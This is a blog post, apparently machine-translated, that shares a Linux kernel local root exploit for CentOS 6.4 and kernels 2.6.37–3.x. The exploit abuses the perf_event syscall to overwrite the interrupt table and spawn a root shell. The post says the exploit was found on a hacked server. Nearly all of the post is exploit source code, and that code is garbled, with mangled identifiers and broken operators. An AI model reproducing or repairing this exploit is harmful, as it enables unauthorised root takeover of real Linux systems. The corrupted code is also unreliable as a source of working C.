LInux Security Test 2

Centos/centos 6.4 Linux kernel 2.6.3.2 local power exp Code

Jincon posted on 2014-05-31 08:25:00 Posted in: Code audits

Recently I took over a CentOS server that was hacked to get directly to root permissions, awesome, through analysis, about through

Mysql+exp the right to gain root privileges. Share below.

Specific people can go to test. The code is very aggressive, please use it for security testing, otherwise the consequences will be self-reinforcing.

http://www.jincon.com/archives/187/

/* * Linux 2.6.37-3.x.x x86_64, ~100 LOC * gcc-4.6-o2 semtex.c &&./a.out * [email protected], salut! * * Update: * Seems like CentOS 2.6.32 backported the perf bug, lol. * Jewgold to 115T6JZGRVMGQ2NT1WNUA7CH1EUL9WXT2G if you insist. */#define _gnu_source 1#include <stdint.h> #include <stdio.h> #include <stdlib.h> #include < string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h > #include <assert.h> #define BASE 0x380000000#define SIZE 0x010000000#define ksize 0x2000000#define AB (x) ((UIn  t64_t) ((0xababababll<<32) ^ ((uint64_t) (((x) *313337))) void fuck () {int i,j,k;  uint64_t Uids[4] = {AB (2), AB (3), AB (4), AB (5)};  uint8_t *current = * (uint8_t *) ((uint64_t) UIDs) & (-8192));  uint64_t kbase = ((uint64_t) current) >>36;  uint32_t *fixptr = (void*) AB (1);  *fixptr =-1;    for (i=0; i<4000; i+=4) {uint64_t *p = (void *) &current[i]; uint32_t *t = (void*) p[0]; if ((p[0]! = p[1]) | | ((p[0]>>36)! = kbase))    Continue      for (j=0; j<20; J + +) {for (k = 0; k < 8; k++) if ((uint32_t*) UIDs) [k]! = T[j+k]) goto next;      for (i = 0; i < 8; i++) t[j+i] = 0;      for (i = 0; i < i++) t[j+9+i] = 1;    Return;next:;  }}}void sheep (uint32_t off) {uint64_t buf[10] = {0x4800000001,off,0,0,0,0x300};  int FD = Syscall (298, buf, 0,-1,-1, 0); ASSERT (!close (FD));}  int main () {uint64_t u,g,needle, kbase, *p; uint8_t *code;  uint32_t *map, j = 5;  int i;    struct {uint16_t limit;  uint64_t addr;  } __attribute__ ((packed)) IDT;  ASSERT ((map = mmap ((void*) base, SIZE, 3, 0x32, 0,0)) = = (void*) base);  memset (map, 0, SIZE); Sheep (-1);  Sheep (-2);    for (i = 0; i < SIZE/4; i++) if (Map[i]) {assert (map[i+1]);  Break  } assert (I&LT;SIZE/4);  ASM ("Sidt%0": "=m" (IDT));  Kbase = idt.addr & 0xff000000; U = Getuid ();  g = Getgid (); ASSERT ((code = (void*) mmap ((void*) kbase, Ksize, 7, 0x32, 0, 0))= = (void*) kbase); memset (Code, 0X90, ksize); Code + = KSIZE-1024;  memcpy (Code, &fuck, 1024); memcpy (code-13, "\X0F\X01\XF8\XE8\5\0\0\0\X0F\X01\XF8\X48\XCF", printf ("2.6.37-3.x x86_64\[email protected")  2010\n ")% 27); Setresuid (U,u,u);  Setresgid (G,G,G);    while (j--) {needle = AB (j+1);    ASSERT (P = memmem (code, 1024x768, &needle, 8));    if (!p) continue; *p = j?  ((g<<32) |u):(idt.addr + 0x48);  } sheep (-i + (((IDT.ADDR&AMP;0XFFFFFFFF) -0x80000000)/4) + 16);  ASM ("int $0x4");  ASSERT (!setuid (0)); Return execl ("/bin/bash", "-sh", NULL);}

LInux Security Test 2